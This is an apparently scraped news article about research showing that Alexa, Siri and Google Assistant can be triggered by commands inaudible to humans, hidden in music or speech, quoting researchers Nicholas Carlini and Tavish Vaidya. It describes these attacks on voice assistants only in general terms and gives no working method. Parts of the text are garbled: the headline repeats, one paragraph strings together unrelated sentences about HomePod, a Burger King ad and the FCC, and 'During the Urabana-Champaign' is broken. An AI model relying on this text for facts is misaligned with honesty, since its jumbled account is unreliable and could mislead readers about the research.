Monday, 17 December, 2018

Alexa, Siri, and Google Assistant can hear silent commands that you can't

Alexa, Siri, and Google Assistant can hear silent commands that you can't Alexa, Siri, and Google Assistant can hear silent commands that you can't
Theresa Hayes | 12 May, 2018, 06:01

In laboratory settings, researchers have been able to activate and issue orders to the systems via means that are undetectable to the human ear, according to a new report in The New York Times.

The researchers say criminals could exploit the technology to unlock doors, wire money or buy stuff online, simply with music playing over the radio.

Of course companies always deny that they are eavesdropping or recording your conversations, but the fact that our devices are constantly on the lookout for trigger words can be disconcerting for some.

Speaking to the New York Times, Nicholas Carlini, a fifth-year PhD student in computer security at UC Berkeley and one of the paper's authors said that while such attacks haven't yet been reported, it's possible that "malicious people already employ people to do what I do".

Apple has additional security features to prevent the HomePod smart speaker from unlocking doors and requires users to provide extra authentication, such as unlocking their iPhone, in order to access sensitive data. Last year, a Burger King commercial said, "O.K., Google, what is the Whopper burger?" It is also an area where laws have to catch up, as there is very little legislation on sending subliminal messages to humans and no such laws against sending those inaudible commands to other people's machines. They've used it to instruct smart devices to visit malicious sites, initiate calls, click pictures and send messages. For its part, the Federal Communications Commission (FCC) has discouraged the practice, calling it "counter to the public interest".

Taking the research to the next level, some of the same Berkeley researchers published a paper this month, in which they demonstrated that they could insert silent commands into spoken text and music files. The receiver must be close to the device, but a more powerful ultrasonic transmitter can help increase the effective range. In theory, the researchers claim that cybercriminals could use these subsonic commands to cause all sort of havoc. During the Urabana-Champaign, they showed that though commands couldn't yet penetrate walls, they still had the potential to control smart devices through open windows in buildings.

You can hear the audio files on Carlini's website.

"Companies have to ensure user-friendliness of their devices, because that's their major selling point", said Tavish Vaidya, a researcher at Georgetown.

Carlini stated, "We want to demonstrate that it's possible, and then hope that other people will say, "Okay this is possible, now let's try and fix it'".